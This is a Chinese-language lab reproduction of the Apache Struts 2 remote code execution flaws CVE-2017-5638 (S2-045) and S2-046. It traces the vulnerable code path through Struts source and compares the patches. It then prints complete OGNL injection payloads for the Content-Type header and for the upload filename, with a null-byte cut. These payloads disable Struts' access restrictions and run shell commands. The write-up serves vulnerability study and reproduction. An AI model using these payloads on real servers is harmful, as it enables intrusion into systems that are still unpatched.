Apache Struts 2遠端程式碼執行漏洞復現(第三彈)
0x00 漏洞概述
編號為CVE-2017-5638。
官方描述是:
It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.
在請求頭的Content-Type處注入OGNL表示式,會被Struts 2報錯執行。遠端攻擊者可藉助帶有#cmd=[字串]
的特製Content-Type HTTP頭利用該漏洞執行任意命令。
影響版本:Struts 2.3.5-Struts 2.3.31、Struts 2.5-Struts 2.5.10。
0x01 漏洞原始碼
基於原始碼版本Struts 2.3.20。
git clone https://github.com/apache/Struts.git
cd Struts
git checkout STRUTS_2_3_20
部分網傳為Jakarta plugin外掛導致的問題,其實不然(Struts 2確實有外掛導致的漏洞)。Struts 2預設使用org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
類對上傳資料進行解析,並非外掛。僅有最後一步完成上傳操作(common upload)是呼叫了第三方元件。
入口過濾器
首先進入StrutsPrepareAndExecuteFilter
類(Struts 2預設配置的入口過濾器)。在這裡對輸入物件request
進行封裝:
request = prepare.wrapRequest(request);
跟進這條語句,PrepareOperations.java中可見:
request = dispatcher.wrapRequest(request);
再次跟進,在Dispatcher.java中得到封裝為StrutsRequestWrapper
的過程:
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { // don't wrap more than once if (request instanceof StrutsRequestWrapper) { return request; } String content_type = request.getContentType(); if (content_type != null && content_type.contains("multipart/form-data")) { MultiPartRequest mpr = getMultiPartRequest(); LocaleProvider provider = getContainer().getInstance(LocaleProvider.class); request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); } return request; }
在這裡有兩個地方值得關注。
-
第835行,需要使
content_type.contains("multipart/form-data")
判斷為true。網傳PoC中就有這麼一部分:#nike='multipart/form-data'
這實際就是把關鍵字串挪給了別的鍵,給Content-Type騰出位置。用
nike
是因為發現者為安恆資訊研究員Nike.Zheng。 -
第836行,
getMultiPartRequest()
方法,這個方法可以繼續追蹤下去。通過配置struts.multipart.parser
可以指定不同的解析類,預設則是使用上面提到的org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
。
struts.multipart.parser:該屬性指定處理multipart/form-data的MIME型別(檔案上傳)請求的框架,該屬性支援cos、pell和jakarta等屬性值,即分別對應使用cos的檔案上傳框架、pell上傳及common-fileupload檔案上傳框架。該屬性的預設值為jakarta。
補丁對比
根據官方給出的影響版本範圍,檢視修復補丁——Struts 2.3.32版本和Struts 2.5.10.1版本。
Struts 2.3.32版本修改了:
都是針對LocalizedTextUtil.findText()
方法的。
LocalizedTextUtil.findText方法
跟進這個findText()
方法,可以看到使用了熟悉的引數valueStack
。ValueStack.java中定義了這個引數型別。
即通過鍵值關係從ActionContext
中返回OGNL的堆疊結構。所以這個valueStack
與OGNL的最終被執行有關。
接下來跟進findText()
中與valueStack
相關的語句,可以發現對valueStack
的操作有:
findMessage()
getMessage()
getDefaultMessage()
ReflectionProviderFactory.getInstance().getRealTarget()
findMessage()
執行中都會呼叫到getMessage()
,而getMessage()
和getDefaultMessage()
中都存在buildMessageFormat()
用於資訊格式化。格式化的訊息由TextParseUtil.translateVariables()
生成。
getMessage()
方法有個引數bundleName
,由aClass
賦值,而aClass
是整個觸發流程中的一個File
異常類,並不在Collections.java中。執行過程中,getMessage()
和findMessage()
都只能返回null
,所以會被觸發的只有getDefaultMessage()
。
TextParseUtil.translateVariables方法
跟進一下TextParseUtil.translateVariables()
的實現。
即先對defaultMessage
進行OGNL表示式的提取,然後執行。漏洞觸發的關鍵就是構造含有惡意OGNL表示式的defaultMessage
。
0x02 利用流程
s2-045
先行測試
隨便傳個檔案後抓包改包。
使用的PoC為(必須含有multipart/form-data
):
Content-Type:%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data
運算被執行!
傳馬
"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls -l /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
s2-046
與s2-045類似,但注入位置是上傳檔案的filename
。
先行測試
PoC:
%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b
在最後的b對應位元組前,使用00截斷:
傳馬
"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} b"
再次使用00截斷即可。
0x03 補充
所使用的vulhub映象把s2-045去掉了,只能自行找war包搭建,不過說不定其它版本的vulhub還保留著。
s2-046的方法更為暴力,也更容易被WAF過濾。基本上有s2-045則必有s2-046。